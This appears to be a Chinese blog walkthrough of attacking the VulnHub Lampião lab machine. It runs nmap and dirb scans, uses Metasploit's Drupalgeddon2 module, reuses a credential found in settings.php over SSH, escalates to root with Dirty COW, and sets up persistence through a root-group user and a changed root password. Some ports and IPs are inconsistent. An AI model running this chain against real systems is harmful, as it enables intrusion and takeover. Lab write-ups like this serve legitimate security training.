Lampião靶机渗透

一、镜像下载

  1. Lampião: 1 ~ VulnHub
  2. https://download.vulnhub.com/lampiao/Lampiao.zip

3、VM 镜像文件打开

4、将虚拟机适配器设置为NAT模式

二、信息搜集

1、kali扫描靶机IP地址

arp-scan -l

2、nmap搜集该主机开放的端口

nmap -sS -T4 -P 1-65535 -v 192.168.245.129

80端口是一个静态页面。没有什么太多信息

3、端口碰撞 扫描出1098端口

nmap 192.168.245.129 -Pn -p 3

nmap - sS - sV -A -v -p- -T5 192.168.245.129

4、找到web服务

5、发现drupal,利用漏洞
通过开放的1898端口进入网站,看到目标网站,发现网站cms是drupal

# msf 搜索drupal漏洞,使用可利用漏洞进行攻击

>search drupal

# exploit/unix/webapp/drupal_drupalgeddon2

>use 1

>set rhosts 192.168.245.129

>set rport 1898

>run

问题:

6、继续信息搜集

kali扫描网站目录

dirb http://192.168.245.129:1898/

大量配置信息显示

 

1、测试网页进行弱口令爆破--失败

2、登陆框SQL注入---失败

3、xss跨站脚本攻击测试

4、 检查网页,发下下图两处能点击:

 

 

观察在node/3中有一个音频文件和一句话“Node 2 is not working”

先打开音频文件听一下,没有发现有用信息。

将node/3改为node/2试一下:

三、利用msfconsole工具攻击建立会话

python -c 'import pty; pty.spawn("/bin/bash")'

shell

四、提权

信息搜集

查找网站数据库的配置文件,在/var/www/html/sites/default/settings.php中找到了配置信息!!!

远程连接

ssh tiago@192.168.10.112
password:Virgulino

查看内核版本

uname -a

脏牛提权

searchsploit dirty

xp: GitHub - gbonacini/CVE-2016-5195: A CVE-2016-5195 exploit example.

将木马文件上传至服务器

进入文件目录 cd /tmp/CVE-2016-5195-master

make编译

./dcow -s1

后门:

创建用户

useradd Monster

将用户加入到管理组

usermod -g root Monster

修改root账户密码

passwd root

passwd Monster

  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

咩了个咩咩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值